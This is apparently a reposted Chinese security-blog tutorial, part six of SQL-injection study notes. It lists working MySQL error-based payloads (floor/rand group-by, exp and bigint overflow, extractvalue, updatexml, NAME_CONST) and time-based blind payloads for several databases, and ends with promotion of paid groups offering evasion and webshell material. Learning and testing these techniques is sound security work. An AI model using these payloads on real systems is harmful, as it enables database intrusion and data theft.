sqli学习笔记-06
2023-2-16 10:12:59 Author: 渗透安全团队(查看原文) 阅读量:11 收藏

sqli学习笔记-06

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

前言

接前文(sqli学习笔记-05),继续补充布尔类型的sqli盲注

正文

基于报错的 SQL 盲注

主要逻辑是: 构造 payload 让信息通过错误提示回显出来

类型一

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a

这里有三个注意点:

一是需要 concat 计数,二是 floor,取得 0 or 1,进行数据的 重复,三是 group by 进行分组

大致原理为分组后数据计数时 重复造成的错误。也有解释为 mysql 的 bug 的问题。但是此处需要将 rand(0),rand()需 要多试几次才行。

以上语句可以简化成如下的形式:

select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))

如果关键的表被禁用了,可以使用这种形式:

select count(*) from (select 1 union select null unionselect !1) group by concat(version(),floor(rand(0)*2))

如果 rand 被禁用了可以使用用户变量来报错

select min(@a:=1) from information_schema.tables group by concat(passwo rd,@a:=(@a+1)%2)

类型二

select exp(~(select * FROM(SELECT USER())a)) //double 数值类 型超出范围

注意: Exp()为以 e 为底的对数函数;版本在 5.5.5 及其以上

具体可以参考: http://drops.xmd5.com/static/drops/tips-8166.html

类型三

select !(select * from (select user())x) -(ps:这是减号) ~0//bigint 超出范围;~0 是对 0 逐位取反,很大的版本在 5.5.5 及其以上

具体可以参考:

https://paper.seebug.org/papers/Archive/drops2/%E5%9F%BA%E4%BA%8EBIGINT%E6%BA%A2%E5%87%BA%E9%94%99%E8%AF%AF%E7%9A%84SQL%E6%B3%A8%E5%85%A5.html

https://cloud.tencent.com/developer/article/1521107

类型四

extractvalue(1,concat(0x7e,(select @@version),0x7e)) se//mysql 对 xml 数据进 行查询和修改的 xpath 函数,xpath 语法错误

具体可以参考:

https://tr0jan.top/archives/6/

类型五

updatexml(1,concat(0x7e,(select @@version),0x7e),1) //mysql对xml数据进行 查询和修改的 xpath 函数,xpath 语法错误

具体可以参考:

https://tr0jan.top/archives/6/

类型六

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;//mysql 重复特性,此处重复了 version,所以报错。

基于时间的 SQL 盲注-延时注入

例1

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假, 执行 sleep

例2

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;//BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达 式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执 行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用 sleep()函数进行注入。

补充:

databasefunction
MysqlBENCHMARK(100000,MD5(1)) or sleep(5)
PostgresqlPG_SLEEP(5) OR GENERATE_SERIES(1,10000)
Ms sql serverWAITFOR DELAY ‘0:0:5’


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247498090&idx=2&sn=b139014b9e6c7dc9682858885fc50aac&chksm=c17604c5f6018dd3b73aad4aceecbaedadbed1d213b3e911f7da40760faabb082e3eabb418f0#rd
如有侵权请联系:admin#unsafe.sh